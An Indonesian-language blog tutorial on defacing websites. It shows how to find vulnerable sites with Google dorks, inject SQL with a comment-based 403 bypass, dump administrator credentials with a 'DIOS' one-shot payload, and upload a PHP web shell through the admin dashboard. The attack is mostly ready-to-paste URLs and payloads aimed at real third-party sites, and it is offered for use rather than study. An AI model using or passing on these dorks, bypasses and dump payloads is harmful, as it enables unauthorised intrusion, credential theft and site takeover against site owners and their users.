Deface POC SQLI dengan DIOS (Dump In One Shot) - Upload Shell


Hallo, 

Metode ini sebenernya sudah cukup lama dan telah banyak ditulis di blog-blog lain, Namun karena artikel dari Blog ini masih sedikit. Maka saya juga menuliskan nya disini.

Tanpa banyak basa basi lagi, langsung aja kita ke tutorialnya.

Mencari Target

Seperti biasa, tahap pertama adalah mencari target yang Vuln terhadap SQL Injection.

Kalian bisa menggunakan google dork dibawah ini untuk mencari nya.

inurl:/berita.php?id= site=(country code)
inurl:/galeri.php?id=
inurl:/news.php?id= site:(country code)
inurl:/gallery.php?id= site:(country code)
inurl:/.php?id= site:(country code)
Note : (country code) di isi dengan domain negara di seluruh dunia, Misalnya : .id untuk Indonesia, .in untuk India dan seterusnya.

Ciri-Ciri Vuln Terhadap SQL Injection

Untuk cirinya biasanya akan menampilkan message error atau hanya blank saja. Bisa dilihat gambar dibawah ini, ini adalah halaman normal (sengaja Saya sensor fotonya).


Lalu setelah Saya menambahkan (') di akhir parameter nya (ex:http://localhost/berita.php?id=1337') maka akan menampilkan blank seperti ini.


Kalau seperti itu, kemungkinan besar website tersebut Vuln terhadap SQL Injection.

Menemukan Magic Number

Setelah mendapatkan target yang Vuln, maka tahap selanjutnya adalah menemukan Magic Number.

http://localhost/berita.php?id=1337'+order+by+1--+- (Normal)
http://localhost/berita.php?id=1337'+order+by+2--+- (Normal)
http://localhost/berita.php?id=1337'+order+by+3--+- (Normal)
http://localhost/berita.php?id=1337'+order+by+4--+- (Normal)
http://localhost/berita.php?id=1337'+order+by+5--+- (Normal)
http://localhost/berita.php?id=1337'+order+by+6--+- (Normal)
http://localhost/berita.php?id=1337'+order+by+7--+- (Error)

Pada saat melakukan order by di angka ke 7, Saya menemukan error yang seperti tadi (blank) Maka bisa dipastikan bahwa column nya hanya ada 6.

Lanjut menemukan Magic Number menggunakan union select, Seperti ini.
http://localhost/berita.php?id=1337'+and+0+union+select+1,2,3,4,5,6--+- (403 Forbidden)

Sayang sekali, aksi kita diblock oleh server. Tapi tenang, ada solusinya yaitu bypass 403 forbidden tersebut menggunakan comment seperti ini.
http://localhost/berita.php?id=1337'+and+0+/*!31337union*/+/*!31337select*/+1,2,3,4,5,6--+

BOOM! Kita berhasil menemukan Magic number nya yaitu 4, 5 dan 3.

Dump Table Dan Column Menggunakan DIOS (Dump In One Shot)

Setelah menemukan Magic number maka tahap selanjutnya adalah dump table dan column nya menggunakan DIOS (Dump in one shot).

Untuk DIOS nya silahkan dicopy dibawah ini.
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
Untuk dump table dan column nya Kalian hanya perlu memasukkan DIOS tersebut ke salah satu Magic Number yang tadi, seperti ini.
http://localhost/berita.php?id=1337'+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6--+-

Untuk menemukan Username dan Password administrator web tersebut, Kalian harus memilih table dan column yang ingin Kalian dump (Disini saya ingin dump table tbl_1_pengguna dan column nya adalah username, password).
http://localhost/berita.php?id=1337'+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(NAMATABLE)where@:=make_set(511,@,0x3c6c693e,NAMACOLUMN,NAMACOLUMN)),@),6--+-
Silahkan Kalian sesuaikan dengan nama table beserta column nya dengan target Kalian masing-masing.


Yaps, kita berhasil mendapatkan Username dan Password dari administrator web tersebut.

Upload Shell

Setelah mendapatkan username dan password administrator web tersebut, Maka tinggal mencari saja Halaman login admin tersebut dan masukkan username/password seperti yang tadi kita dapat.


Jika username dan password nya benar, Maka Kalian akan diarahkan ke Dashboard.


Disitu Saya mencoba mengupload Shell dengan extensi PHP dan berhasil.


Sekarang bebas deh mau ngapain aja Upload, edit, rename, delete dan lain-lain asal nggak red dir 😅.

Akhir Kata

Oke Mungkin cukup sampai disini aja artikel kali ini tentang "Deface POC SQLI dengan DIOS (Dump In One Shot) - Upload Shell".
Mohon maaf bila ada kesalahan kata dan sebagainya, Mohon dimaklumi.

Semoga bermanfaat dan Sampai jumpa di artikel selanjutnya!